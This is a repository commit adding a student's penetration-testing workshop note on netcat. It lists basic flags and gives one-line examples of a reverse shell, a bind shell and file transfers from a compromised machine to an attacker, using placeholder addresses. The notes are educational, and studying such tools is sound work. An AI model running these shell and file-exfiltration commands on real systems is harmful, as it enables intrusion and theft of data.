vault backup: 2024-10-16 09:12:37
This commit is contained in:
29
Penetration Testing/Week 3/Workshop 3 - netcat.md
Normal file
29
Penetration Testing/Week 3/Workshop 3 - netcat.md
Normal file
@@ -0,0 +1,29 @@
|
||||
nc: TCP/IP Swiss Army Knife
|
||||
ncat: concatenate and redirect sockets
|
||||
|
||||
-l: Listen and Bind
|
||||
-p: Port
|
||||
\--ssl: Use SSL
|
||||
|
||||
Example (Reverse Shell):
|
||||
|
||||
Attacker Client: `nc -lp 4444`
|
||||
Compromised Client: `nc 1.0.0.0 4444 -e cmd.exe`
|
||||
|
||||
Example (Bind Shell):
|
||||
|
||||
Attacker Client: `nc 1.0.0.1 4444`
|
||||
Compromised Client: `nc -lp 4444 -e cmd.exe -k`
|
||||
|
||||
Example (File Transfer Receive):
|
||||
|
||||
Attacker Client: `nc -lp 4444 > newFile`
|
||||
Compromised Client: `nc 1.0.0.1 4444 < oldFile`
|
||||
|
||||
Example (File Transfer Transmit):
|
||||
|
||||
Attacker Client: `nc -lp 4444 < newFile`
|
||||
Compromised Client: `nc 1.0.0.1 > oldFile`
|
||||
|
||||
Log into Windows Machine:
|
||||

|
Reference in New Issue
Block a user